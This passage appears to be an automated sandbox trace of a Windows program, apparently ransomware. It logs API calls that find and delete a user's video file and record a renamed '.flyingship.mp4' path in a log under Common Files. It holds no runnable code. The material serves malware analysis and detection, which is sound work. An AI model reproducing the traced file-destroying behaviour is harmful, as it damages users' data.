HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4", lpFilePart=0x0) returned 0x39 [0198.625] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2966e470, ftCreationTime.dwHighDateTime=0x1d5e12b, ftLastAccessTime.dwLowDateTime=0x1a312ae0, ftLastAccessTime.dwHighDateTime=0x1d5e489, ftLastWriteTime.dwLowDateTime=0x1b470500, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x2f3c, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="zEgvJih7.mp4", cAlternateFileName="")) returned 0x90ae18 [0198.625] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\zegvjih7.mp4")) returned 1 [0198.626] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2966e470, ftCreationTime.dwHighDateTime=0x1d5e12b, ftLastAccessTime.dwLowDateTime=0x1a312ae0, ftLastAccessTime.dwHighDateTime=0x1d5e489, ftLastWriteTime.dwLowDateTime=0x1b470500, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x2f3c, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="zEgvJih7.mp4", cAlternateFileName="")) returned 0 [0198.626] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0198.627] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.628] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0198.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0198.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0198.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0198.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0198.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0198.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0198.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0198.628] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0198.628] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0198.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0198.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.628] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.628] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0198.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.629] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0198.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0198.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.629] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0198.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0198.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0198.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.629] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0198.630] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0198.630] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.630] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0198.630] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.630] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0198.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.630] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0198.630] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3cc4, lpOverlapped=0x0) returned 1 [0198.631] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0198.631] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x3cc4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.631] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0198.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0198.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.flyingship.mp4\r\n", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0198.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x47) returned 0x9aa548 [0198.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.flyingship.mp4\r\n", cchWideChar=71, lpMultiByteStr=0x9aa548, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.flyingship.mp4\r\n", lpUsedDefaultChar=0x0) returned 71 [0198.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0198.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0198.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0198.632] WriteFile (in: hFile=0x160, lpBuffer=0x9238c0*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9238c0*, lpNumberOfBytesWritten=0x87f43c*=0x46, lpOverlapped=0x0) returned 1 [0198.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0198.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.632] CloseHandle (hObject=0x160) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0198.633] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0198.633] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0198.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0198.634] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0198.635] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.635] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0198.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0198.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0198.643] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0198.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0198.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0198.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0198.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0198.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0198.644] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0198.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0198.644] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.644] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0198.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0198.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0198.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0198.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0198.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.645] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0198.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0198.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0198.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0198.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0198.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.646] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0198.646] RtlAllocateHeap 